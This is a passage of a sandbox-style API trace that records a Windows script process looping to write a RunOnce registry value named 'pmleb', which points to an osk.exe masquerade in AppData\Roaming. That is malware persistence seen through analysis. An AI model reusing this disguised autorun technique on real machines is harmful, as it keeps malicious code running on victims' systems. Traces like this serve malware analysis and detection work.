(dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.877] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.877] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.877] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.877] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.877] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.878] RegCloseKey (hKey=0x280) returned 0x0 [0081.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.878] SetTimer (hWnd=0x20280, nIDEvent=0x20cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cd [0081.878] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.890] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.890] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.890] KillTimer (hWnd=0x20280, uIDEvent=0x20cd) returned 1 [0081.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.890] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.890] IUnknown:Release (This=0x787518) returned 0x1 [0081.891] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.891] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.891] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.891] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.891] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0081.891] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.891] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x53 [0081.892] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.892] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0081.893] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.893] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.893] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.893] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.893] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.893] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.893] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.893] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.893] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.894] RegCloseKey (hKey=0x280) returned 0x0 [0081.894] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.894] SetTimer (hWnd=0x20280, nIDEvent=0x20ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ce [0081.894] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.905] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.905] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.906] KillTimer (hWnd=0x20280, uIDEvent=0x20ce) returned 1 [0081.906] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.906] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.906] IUnknown:Release (This=0x787518) returned 0x1 [0081.906] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.906] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.906] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.907] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.907] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0081.907] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.907] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x54 [0081.907] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.908] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0081.908] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.908] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.908] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.908] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.908] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.909] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.909] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.909] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.909] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.909] RegCloseKey (hKey=0x280) returned 0x0 [0081.909] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.909] SetTimer (hWnd=0x20280, nIDEvent=0x20cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cf [0081.909] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.922] KillTimer (hWnd=0x20280, uIDEvent=0x20cf) returned 1 [0081.922] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.922] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.922] IUnknown:Release (This=0x787518) returned 0x1 [0081.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.923] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.923] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.923] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.923] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0081.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.923] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x55 [0081.923] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, 